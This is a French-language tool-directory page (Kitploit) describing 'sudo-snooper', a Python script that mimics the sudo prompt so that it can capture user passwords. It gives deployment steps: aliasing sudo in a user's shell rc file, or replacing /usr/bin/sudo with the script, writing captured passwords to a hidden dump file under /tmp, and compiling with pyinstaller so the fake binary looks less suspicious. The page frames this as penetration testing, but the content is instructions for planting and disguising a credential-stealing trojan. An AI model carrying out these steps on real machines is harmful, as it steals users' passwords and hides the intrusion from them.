Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
sudo-snooper — Script Python qui imite le binaire sudo original pour tromper les utilisateurs et leur faire entrer leur mot de passe. | Kitploit
Outils/GitHubGitHub/xorond/sudo-snooper
Outils de PhishingAttaques de Mots de PasseTests d'IntrusionIngénierie Sociale
GitHubxorond/sudo-snooper

sudo-snooper

Script Python qui imite le binaire sudo original pour tromper les utilisateurs et leur faire entrer leur mot de passe.

Voir le dépôt
7034il y a 6 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

sudo-snooper

sudo-snooper se comporte comme le binaire sudo original pour tromper les utilisateurs afin qu'ils saisissent leur mot de passe.

Il affichera une invite factice, identique à l'originale, demandant à l'utilisateur de saisir son mot de passe sudo.

Cela peut être utile dans les tests d'intrusion ou les évaluations de sécurité pour tester la connaissance des utilisateurs.

Étapes d'installation

Option 1 - Alias de la commande sudo (plus facile mais un peu plus visible)

Cette option est plus facile à mettre en œuvre et plus portable, mais elle pourrait être plus visible pour les utilisateurs attentifs.

Modifiez le fichier .rc du shell utilisé par l'utilisateur (peut être .bashrc, .zshrc, etc.) et ajoutez ce qui suit :

root@kitploit:~
alias sudo='python3 /path/to/sudo-snooper.py'

Assurez-vous que sudo-snooper.py a les permissions correctes.

Option 2 - Installation à la place du vrai sudo (plus difficile mais moins évidente)

Vous avez besoin d'un accès root pour cette option d'installation

Cela devient utile uniquement si vous avez déjà un accès root mais que vous ne pouvez pas casser les hachages de /etc/shadow pour une raison quelconque. En gros, vous pouvez hameçonner le mot de passe de l'utilisateur.

  • déplacez le binaire sudo original vers un autre nom
root@kitploit:~
# mv /usr/bin/sudo /usr/bin/somename
  • modifiez les paramètres dans le fichier selon vos préférences

Modifiez ces éléments dans sudo-snooper.py :

root@kitploit:~
dumpdir = "/tmp/.snooper"
dumpfile = "/tmp/.snooper/dump.txt"
sudo = 'sudo'
  • installez le fichier python dans /usr/bin/sudo (ou là où se trouvait sudo auparavant)
root@kitploit:~
# install -dm755 sudo-snooper.py /usr/bin/sudo
  • donnez les permissions nécessaires au fichier python

    Vous pouvez faire plus sophistiqué ici en créant un fichier exécutable non lisible pour les utilisateurs, mais je ne vais pas entrer dans ce détail. Consultez certaines réponses ici pour cela.

NOTE : Une manière un peu plus convaincante d'installer ceci est de le compiler avec pyinstaller afin qu'il n'apparaisse pas comme un fichier python lorsque file /usr/bin/sudo est exécuté.

Pour ce faire sous Archlinux : pyinstaller --onefile sudo-snooper.py fonctionnera. Cependant, notez qu'une fois compilé, vous ne pourrez plus modifier les paramètres dans le binaire compilé.

Utilisation :

Une fois installé, sudo-snooper peut être appelé comme le sudo normal.

Par exemple, exécuter

root@kitploit:~
sudo vim /etc/resolv.conf

entraînera l'appel de sudo-snooper (en supposant qu'il est correctement installé).

Il demandera le mot de passe de l'utilisateur, puis exécutera la commande en la redirigeant vers le vrai binaire sudo si le mot de passe est correct.

Vous pouvez ensuite récupérer le mot de passe de l'utilisateur en lisant le fichier de vidage dans les paramètres.

TODO :

  • gérer le cas où l'utilisateur entre un mauvais mot de passe
Télécharger l’outil